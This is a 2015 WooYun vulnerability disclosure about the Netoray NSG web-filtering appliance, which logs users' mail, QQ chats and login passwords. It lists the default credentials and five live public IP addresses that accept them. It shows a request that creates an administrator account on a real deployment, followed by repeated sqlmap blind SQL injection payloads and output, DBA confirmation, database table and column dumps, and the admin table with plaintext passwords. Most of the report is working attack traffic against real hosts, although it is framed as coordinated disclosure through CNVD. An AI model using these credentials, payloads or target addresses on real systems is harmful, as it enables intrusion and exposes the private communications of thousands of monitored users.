莱克斯科技上网行为管理系统存在默认口令及SQL注入DBA权限(案例中全校师生隐私告急)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102342

漏洞标题：莱克斯科技上网行为管理系统存在默认口令及SQL注入DBA权限(案例中全校师生隐私告急)

漏洞作者：路人甲

提交时间：2015-03-19 15:08

修复时间：2015-06-22 08:58

公开时间：2015-06-22 08:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-19：细节已通知厂商并且等待厂商处理中
2015-03-24：厂商已经确认，细节仅向厂商公开
2015-03-27：细节向第三方安全合作伙伴开放
2015-05-18：细节向核心白帽子及相关领域专家公开
2015-05-28：细节向普通白帽子公开
2015-06-07：细节向实习白帽子公开
2015-06-22：细节向公众公开

简要描述：

不得不卧槽这个“上网行为管理系统”居然能记录各个品牌邮箱收发邮件记录内容，QQ聊天详细记录，飞信记录，微博记录，ftp记录，telnet记录和所有所有网页登录账号密码记录等等信息都会记录得一清二楚的（异常强大），而且很多高校使用，请问学生的隐私去哪了？使用这款路由上网“完全没有任何隐私可言”。。

详细说明：

Netoray NSG 上网行为管理系统，存在默认口令：superadmin/123456
通过默认口令登录发现存在注入，而且是dba权限。而且这个路由功能异常强大，凡是通过这个路由上网的设备都会把你上网的内容记录得一清二楚。（同时发现案例存在一所高校，用户连接数12000+以上，学生所有网上行为一清二楚。。）

默认口令案例：
https://121.250.28.125/
https://221.123.130.107/
https://60.30.2.74/
https://119.2.27.73/
https://117.36.195.144/

漏洞证明：

https://121.250.28.125/cgi-bin/system_management/usap_admin.cgi?cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=465410561&lang=zh_CN.UTF-8

sqlmap identified the following injection points with a total of 1308 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
current database:    'NTC'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
current user is DBA:    True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(5)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
[136 tables]
+----------------------------+
| nedata_ipmacbind_record    |
| newurl                     |
| t_data_mail                |
| t_data_mobileapp           |
| t_data_netphone            |
| t_data_nettv               |
| t_data_ongame              |
| t_data_operation           |
| t_data_p2p                 |
| t_data_payinfo             |
| t_data_policyroute         |
| t_data_priviledge          |
| t_data_proxy               |
| t_data_qq_pwd              |
| t_data_qq_sn               |
| t_data_rdp                 |
| t_data_retrresult          |
| t_data_sip                 |
| t_data_smb                 |
| t_data_ssh                 |
| t_data_ssl                 |
| t_data_stock               |
| t_data_telnet              |
| t_data_telnetcmd           |
| t_data_transfile           |
| t_data_unknowurl           |
| t_rep_alertlog             |
| t_rep_app                  |
| t_rep_dataindex            |
| t_rep_flow                 |
| t_rep_get                  |
| t_rep_im                   |
| t_rep_index                |
| t_rep_mail                 |
| t_rep_post                 |
| t_rep_session              |
| t_rep_time                 |
| t_sys_aclpolicy            |
| t_sys_admin                |
| t_sys_admingroup           |
| t_sys_admingrouprolemap    |
| t_sys_adminrolemap         |
| t_sys_alertlog             |
| t_sys_app                  |
| t_sys_appbwlist            |
| t_sys_appgroup             |
| t_sys_billingip            |
| t_sys_billinglog           |
| t_sys_billingpolicy        |
| t_sys_billinguser          |
| t_sys_bwdevice             |
| t_sys_bwginfo              |
| t_sys_bwglist              |
| t_sys_bwip                 |
| t_sys_bwpolicychannel      |
| t_sys_bwpolicyvalue        |
| t_sys_bwtraffic            |
| t_sys_bypass               |
| t_sys_cltdeviceobj         |
| t_sys_cltfileobj           |
| t_sys_cltosobj             |
| t_sys_cltpolicycontent     |
| t_sys_cltpolicymain        |
| t_sys_cltpolicyuser        |
| t_sys_cltportobj           |
| t_sys_cltprocobj           |
| t_sys_cltregobj            |
| t_sys_clttime              |
| t_sys_cntuser              |
| t_sys_command_transit      |
| t_sys_customreport         |
| t_sys_customsubnet         |
| t_sys_datasync             |
| t_sys_dumptable            |
| t_sys_filefeature          |
| t_sys_functions            |
| t_sys_help                 |
| t_sys_httptype             |
| t_sys_ignoresuffix         |
| t_sys_keylib               |
| t_sys_keyword              |
| t_sys_killexecute          |
| t_sys_l3switch             |
| t_sys_localip              |
| t_sys_managelog            |
| t_sys_mobileuser_log       |
| t_sys_modules              |
| t_sys_monif                |
| t_sys_netcapture           |
| t_sys_ntpserver            |
| t_sys_pages                |
| t_sys_parameter            |
| t_sys_queryinfo            |
| t_sys_resources            |
| t_sys_retrtask             |
| t_sys_role                 |
| t_sys_roleusergroupmap     |
| t_sys_roleusermap          |
| t_sys_rule                 |
| t_sys_ruleactdef           |
| t_sys_ruleipobj            |
| t_sys_ruleopconf           |
| t_sys_ruleopdef            |
| t_sys_ruleoptdef           |
| t_sys_rulewarndef          |
| t_sys_snmp                 |
| t_sys_snmp_trap            |
| t_sys_subnetgroup          |
| t_sys_timepolicy           |
| t_sys_timepolicyscope      |
| t_sys_uplink_default_param |
| t_sys_uplink_dev_list      |
| t_sys_uplink_local         |
| t_sys_uplink_upload_index  |
| t_sys_uplink_upload_work   |
| t_sys_uplink_vector        |
| t_sys_uplinkversion        |
| t_sys_urlbwlist            |
| t_sys_urlclass             |
| t_sys_urllib               |
| t_sys_user                 |
| t_sys_user_bwlist          |
| t_sys_user_macbwlist       |
| t_sys_usergroup            |
| t_sys_useronline           |
| t_sys_useronline_history   |
| t_sys_useronlinelog        |
| t_sys_versionlog           |
| t_sys_warnmail             |
| t_sys_warnpage             |
| t_sys_webmail              |
| v_sys_adminvalidroles      |
| v_sys_adminvalidusergroups |
| v_sys_adminvalidusers      |
| v_sys_rolevalidusergroups  |
| v_sys_rolevalidusers       |
+----------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
Table: t_sys_user
[33 columns]
+--------------+------------------+
| Column       | Type             |
+--------------+------------------+
| check_valid  | int(11)          |
| circle_check | int(11)          |
| create_time  | datetime         |
| creator      | varchar(64)      |
| eip          | int(10) unsigned |
| end_time     | datetime         |
| false_times  | int(11)          |
| fee          | float            |
| free_audit   | int(11)          |
| gid          | int(32) unsigned |
| invalid_date | int(11)          |
| invalid_time | datetime         |
| invalid_unit | int(11)          |
| key_user     | int(11)          |
| ldap_name    | varchar(64)      |
| lock_time    | int(11)          |
| login_time   | datetime         |
| mac          | varchar(32)      |
| name         | varchar(64)      |
| permit_times | int(11)          |
| pwd          | varchar(64)      |
| real_name    | varchar(64)      |
| settle_type  | int(11)          |
| share_number | int(11)          |
| sip          | int(10) unsigned |
| start_time   | datetime         |
| status       | char(1)          |
| tel          | char(32)         |
| uid          | int(32) unsigned |
| unlock_time  | datetime         |
| valid_date   | int(11)          |
| valid_time   | datetime         |
| valid_unit   | int(11)          |
+--------------+------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
Table: t_sys_user
[0 entries]
+----------+-----+
| key_user | pwd |
+----------+-----+
+----------+-----+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
Table: t_sys_user
[0 entries]
+----------+-----+------+
| key_user | pwd | name |
+----------+-----+------+
+----------+-----+------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
Table: t_sys_user
[33 columns]
+--------------+------------------+
| Column       | Type             |
+--------------+------------------+
| check_valid  | int(11)          |
| circle_check | int(11)          |
| create_time  | datetime         |
| creator      | varchar(64)      |
| eip          | int(10) unsigned |
| end_time     | datetime         |
| false_times  | int(11)          |
| fee          | float            |
| free_audit   | int(11)          |
| gid          | int(32) unsigned |
| invalid_date | int(11)          |
| invalid_time | datetime         |
| invalid_unit | int(11)          |
| key_user     | int(11)          |
| ldap_name    | varchar(64)      |
| lock_time    | int(11)          |
| login_time   | datetime         |
| mac          | varchar(32)      |
| name         | varchar(64)      |
| permit_times | int(11)          |
| pwd          | varchar(64)      |
| real_name    | varchar(64)      |
| settle_type  | int(11)          |
| share_number | int(11)          |
| sip          | int(10) unsigned |
| start_time   | datetime         |
| status       | char(1)          |
| tel          | char(32)         |
| uid          | int(32) unsigned |
| unlock_time  | datetime         |
| valid_date   | int(11)          |
| valid_time   | datetime         |
| valid_unit   | int(11)          |
+--------------+------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
[136 tables]
+----------------------------+
| nedata_ipmacbind_record    |
| newurl                     |
| t_data_mail                |
| t_data_mobileapp           |
| t_data_netphone            |
| t_data_nettv               |
| t_data_ongame              |
| t_data_operation           |
| t_data_p2p                 |
| t_data_payinfo             |
| t_data_policyroute         |
| t_data_priviledge          |
| t_data_proxy               |
| t_data_qq_pwd              |
| t_data_qq_sn               |
| t_data_rdp                 |
| t_data_retrresult          |
| t_data_sip                 |
| t_data_smb                 |
| t_data_ssh                 |
| t_data_ssl                 |
| t_data_stock               |
| t_data_telnet              |
| t_data_telnetcmd           |
| t_data_transfile           |
| t_data_unknowurl           |
| t_rep_alertlog             |
| t_rep_app                  |
| t_rep_dataindex            |
| t_rep_flow                 |
| t_rep_get                  |
| t_rep_im                   |
| t_rep_index                |
| t_rep_mail                 |
| t_rep_post                 |
| t_rep_session              |
| t_rep_time                 |
| t_sys_aclpolicy            |
| t_sys_admin                |
| t_sys_admingroup           |
| t_sys_admingrouprolemap    |
| t_sys_adminrolemap         |
| t_sys_alertlog             |
| t_sys_app                  |
| t_sys_appbwlist            |
| t_sys_appgroup             |
| t_sys_billingip            |
| t_sys_billinglog           |
| t_sys_billingpolicy        |
| t_sys_billinguser          |
| t_sys_bwdevice             |
| t_sys_bwginfo              |
| t_sys_bwglist              |
| t_sys_bwip                 |
| t_sys_bwpolicychannel      |
| t_sys_bwpolicyvalue        |
| t_sys_bwtraffic            |
| t_sys_bypass               |
| t_sys_cltdeviceobj         |
| t_sys_cltfileobj           |
| t_sys_cltosobj             |
| t_sys_cltpolicycontent     |
| t_sys_cltpolicymain        |
| t_sys_cltpolicyuser        |
| t_sys_cltportobj           |
| t_sys_cltprocobj           |
| t_sys_cltregobj            |
| t_sys_clttime              |
| t_sys_cntuser              |
| t_sys_command_transit      |
| t_sys_customreport         |
| t_sys_customsubnet         |
| t_sys_datasync             |
| t_sys_dumptable            |
| t_sys_filefeature          |
| t_sys_functions            |
| t_sys_help                 |
| t_sys_httptype             |
| t_sys_ignoresuffix         |
| t_sys_keylib               |
| t_sys_keyword              |
| t_sys_killexecute          |
| t_sys_l3switch             |
| t_sys_localip              |
| t_sys_managelog            |
| t_sys_mobileuser_log       |
| t_sys_modules              |
| t_sys_monif                |
| t_sys_netcapture           |
| t_sys_ntpserver            |
| t_sys_pages                |
| t_sys_parameter            |
| t_sys_queryinfo            |
| t_sys_resources            |
| t_sys_retrtask             |
| t_sys_role                 |
| t_sys_roleusergroupmap     |
| t_sys_roleusermap          |
| t_sys_rule                 |
| t_sys_ruleactdef           |
| t_sys_ruleipobj            |
| t_sys_ruleopconf           |
| t_sys_ruleopdef            |
| t_sys_ruleoptdef           |
| t_sys_rulewarndef          |
| t_sys_snmp                 |
| t_sys_snmp_trap            |
| t_sys_subnetgroup          |
| t_sys_timepolicy           |
| t_sys_timepolicyscope      |
| t_sys_uplink_default_param |
| t_sys_uplink_dev_list      |
| t_sys_uplink_local         |
| t_sys_uplink_upload_index  |
| t_sys_uplink_upload_work   |
| t_sys_uplink_vector        |
| t_sys_uplinkversion        |
| t_sys_urlbwlist            |
| t_sys_urlclass             |
| t_sys_urllib               |
| t_sys_user                 |
| t_sys_user_bwlist          |
| t_sys_user_macbwlist       |
| t_sys_usergroup            |
| t_sys_useronline           |
| t_sys_useronline_history   |
| t_sys_useronlinelog        |
| t_sys_versionlog           |
| t_sys_warnmail             |
| t_sys_warnpage             |
| t_sys_webmail              |
| v_sys_adminvalidroles      |
| v_sys_adminvalidusergroups |
| v_sys_adminvalidusers      |
| v_sys_rolevalidusergroups  |
| v_sys_rolevalidusers       |
+----------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
Table: t_sys_admin
[17 columns]
+---------------+---------------------+
| Column        | Type                |
+---------------+---------------------+
| activated     | char(1)             |
| burst         | int(32) unsigned    |
| email         | char(64)            |
| endtime       | datetime            |
| ipaddr        | varchar(16)         |
| locked        | tinyint(3) unsigned |
| lockedtime    | datetime            |
| logincount    | tinyint(3) unsigned |
| macaddr       | varchar(18)         |
| maxlogincount | tinyint(3) unsigned |
| name          | char(64)            |
| password      | varchar(16)         |
| shortcut      | varchar(256)        |
| starttime     | datetime            |
| ugid          | int(32) unsigned    |
| uid           | int(32) unsigned    |
| unlocktime    | int(32) unsigned    |
+---------------+---------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: adminname (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND 9685=9685 AND 'eeEm'='eeEm&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cgi_div_id=cgi_34014208_0&rid=34014209&aid=0&act=3&writeway=create&adminname=asdasd' AND (SELECT * FROM (SELECT(SLEEP(30)))UrVu) AND 'VOin'='VOin&gid=1&pwd=123456&ipaddr=0.0.0.0&mac=00:00:00:00:00:00&burst=0&email=&state=Y&stime=0000-00-00&etime=0000-00-00&maxlogincount=5&unlocktime=10&idlist=2,&ajax_rnd=54077353887259961457&user_name=superadmin&session_id=1052874166&lang=zh_CN.UTF-8
---
back-end DBMS: MySQL 5.0.11
Database: NTC
Table: t_sys_admin
[5 entries]
+-----+------------+----------+
| uid | name       | password |
+-----+------------+----------+
| 1   | superadmin | 123456   |
| 2   | manager    | 123456   |
| 3   | maintainer | 123456   |
| 80  | asdasd     | 123456   |
| 81  | 0          | 123456   |
+-----+------------+----------+

修复方案：

联系厂商

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2015-03-24 08:56

厂商回复：

CNVD确认并复现所述情况,由CNVD向软件生产厂商深圳莱克斯公司通报.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102342

漏洞标题：莱克斯科技上网行为管理系统存在默认口令及SQL注入DBA权限(案例中全校师生隐私告急)

相关厂商：莱克斯科技（北京）有限公司

漏洞作者：路人甲

提交时间：2015-03-19 15:08

修复时间：2015-06-22 08:58

公开时间：2015-06-22 08:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

